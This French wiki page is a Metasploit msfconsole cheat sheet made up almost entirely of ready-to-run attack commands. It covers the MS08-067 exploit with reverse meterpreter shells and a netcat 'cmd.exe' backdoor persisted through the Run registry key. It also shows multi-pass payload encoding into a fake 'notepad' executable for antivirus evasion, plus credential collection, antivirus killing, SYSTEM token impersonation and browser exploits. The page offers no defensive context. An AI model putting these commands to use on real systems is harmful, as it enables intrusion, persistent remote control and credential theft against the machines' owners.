Msfconsole

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Console principale du framework
Commande msfconsole
Contexte Metasploit
Voir aussi Msfcli · Meterpreter · Msfpayload

La msfconsole est l'interface principale de Metasploit. Cette page regroupe l'essentiel des commandes et quelques scénarios pratiques.

Ressources

Plugin NeXpose — voir aussi Msfpayload et Postgres_metasploit pour connecter la console à PostgreSQL.

Démarrage

# mode graphique
msfgui
# mode console
msfconsole

Commandes de base

show exploits
show auxiliary
show [tab]

search dcom
search netapi

use exploit/windows/smb/ms08_067_netapi
show options

set RHOST 192.168.0.10
unset RHOST
setg RHOST 192.168.0.10
save
unsetg RHOST

set payload windows/adduser
exploit

back
exit

Arrière-plan et sessions :

background
sessions -l
sessions -i 1

Emplacement des payloads :

cd /opt/framework/msf3/modules/payloads/singles
cd /opt/framework/msf3/modules/payloads/stagers
cd /opt/framework/msf3/modules/payloads/stages

Scénario pratique (MS08-067)

msfconsole
search netapi
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.0.10
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.19
exploit

Puis utilisation de meterpreter.

Gestion des sessions et bureaux

  • Session 0 : la console.
  • Sessions 1, 2, 3… : les consoles distantes.
  • winsta0 : la station interactive.
enumdesktops
getdesktop
setdesktop -h
migrate "PID svchost"
getdesktop

Plugins

Espia

Le plugin espia permet la capture d'écran, audio et vidéo (peu stable sous BackTrack pour l'audio et la webcam). Migrer d'abord sur WinSta0/Default :

migrate "PID explorer"
getuid
getdesktop
use espia
screengrab

Sniffers

use sniffer
sniffer_interfaces
sniffer_start 1
sniffer_stats 1
sniffer_dump 1 file.pcap
sniffer_stop 1

Les scripts du répertoire meterpreter sont utilisables via run :

cd /opt/framework/msf3/scripts/meterpreter
run [tab] [tab]
run checkvm
run credcollect
run enum_firefox
run get_application_list
run killav
run enum_logged_on_users -c

Incognito

use incognito
add_user toto password
add_localgroup_users mygroup toto
run getgui -e

Téléversement de netcat et persistance via le registre :

upload /dir/nc.exe c:\\windows\\system32
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc \
  -d 'c:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
execute -f cmd -i

Configuration du pare-feu et connexion :

netsh firewall show opmode
netsh firewall add portopening TCP 455 "service Firewall" ENABLE ALL
netsh firewall show portopening
nc -v 192.168.0.10 445

Contournement d'antivirus

msfpayload windows/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4432 R | \
  msfencode -e x86/shikata_ga_nai -t raw -c 10 | \
  msfencode -e x86/call4_dword_xor -t raw -c 10 | \
  msfencode -e x86/countdown -t exe > /root/extreme-notepad.exe

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.10
set LPORT 4432
exploit

MITM et kitrap0d

run get_local_subnets
use incognito
list_tokens -g
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
run kitrap0d

Analyse de la victime

run get_env
run get_application_list
run scraper
run winenum -h
run prefetchtool

Exploitation Mozilla / Firefox

use exploit/windows/browser/mozilla_nstreerange
show options
set SRVHOST 192.168.0.10
set SRVPORT 4444
set URIPATH physics
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.10
exploit

Insérer ensuite le lien servi dans le navigateur cible.

XSSF

wget www.metasploit.com/redmine/attachments/596/XSSF.zip
msfconsole
db_connect root:toor@127.0.0.1:3306/msf3
load XSSF
xssf_active_victims
xssf_servers
use exploit/multi/browser/java_signed_applet
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.10
exploit

Divers

show exploits
use windows/smb/ms08_067_netapi
show payloads
use post/windows/escalate/bypassuac

Metasploit over Internet — ouvrir un port sur le routeur puis :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.10 X > /root/home.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.10
exploit

Voir aussi